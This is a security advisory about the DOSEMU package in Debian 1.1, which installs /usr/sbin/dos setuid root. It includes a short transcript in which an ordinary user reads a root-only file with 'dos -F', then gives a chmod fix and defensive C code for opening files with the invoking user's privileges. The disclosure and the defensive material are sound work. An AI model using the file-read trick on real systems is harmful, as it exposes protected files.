COMMAND

    /usr/sbin/dos

SYSTEMS AFFECTED

    DOSEMU package in Debian 1.1

PROBLEM

    In Debian 1.1, the optional DOSEMU package installs /usr/sbin/dos
    setuid root. This is a serious security hole which can be
    exploited to gain access to any file on the system. The package
    version was 0.64.0.2-9.

        $ cat /etc/debian_version
        1.1
        $ id
        uid=xxxx(quinlan) gid=xxxx(quinlan) groups=xxxx(quinlan),20(dialout),24(cdrom)
        [quinlan:~]$ ls -al /usr/bin/dos
        -rwsr-xr-x   1 root     root       569576 Oct 24 00:05 /usr/bin/dos
        $ ls -al /root/foo
        -rw-------   1 root     root         1117 Nov 13 23:10 /root/foo
        $ dos -F /root/foo
        [ Prints /root/foo, which is not readable by user `quinlan'. ]

SOLUTION

    This security hole can be corrected by removing the suid bit from
    /usr/bin/dos:

        $ chmod u-s /usr/bin/dos
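
    The transcript above shows the general flaw: a setuid-root program
    opens a file the user names (here with -F) while its effective uid is
    still root. The C program below is an added example, not DOSEMU's code
    or Debian's fix; open_as_invoker() is a hypothetical helper that opens
    the file with the invoking user's ids so the kernel applies that
    user's permissions.

```c
/* Added example: open a user-named file from a setuid-root program with
 * the invoker's privileges. open_as_invoker() is a hypothetical name. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* Returns a read-only fd opened under the real uid/gid, or -1. */
int open_as_invoker(const char *path)
{
    uid_t saved_euid = geteuid();
    gid_t saved_egid = getegid();
    int fd, saved_errno;

    /* Drop the group first: once euid is unprivileged the gid can no
     * longer be changed. */
    if (setegid(getgid()) != 0)
        return -1;
    if (seteuid(getuid()) != 0) {
        setegid(saved_egid);
        return -1;
    }

    /* The permission check and the open are one system call made as
     * the invoker, so a root-owned mode 0600 file fails with EACCES
     * and there is no access()-then-open() race window. */
    fd = open(path, O_RDONLY | O_NOCTTY);
    saved_errno = errno;

    /* Regain privileges in reverse order; treat failure as an error. */
    if (seteuid(saved_euid) != 0 || setegid(saved_egid) != 0) {
        if (fd >= 0)
            close(fd);
        return -1;
    }
    errno = saved_errno;
    return fd;
}

int main(int argc, char **argv)
{
    int fd = (argc == 2) ? open_as_invoker(argv[1]) : -1;
    if (fd < 0) {
        perror(argc == 2 ? argv[1] : "usage: prog FILE");
        return 1;
    }
    printf("opened %s as uid %d\n", argv[1], (int)getuid());
    return close(fd);
}
```

    Installed setuid root and run by an ordinary user against a file such
    as /root/foo, this fails with "Permission denied" instead of printing
    the file.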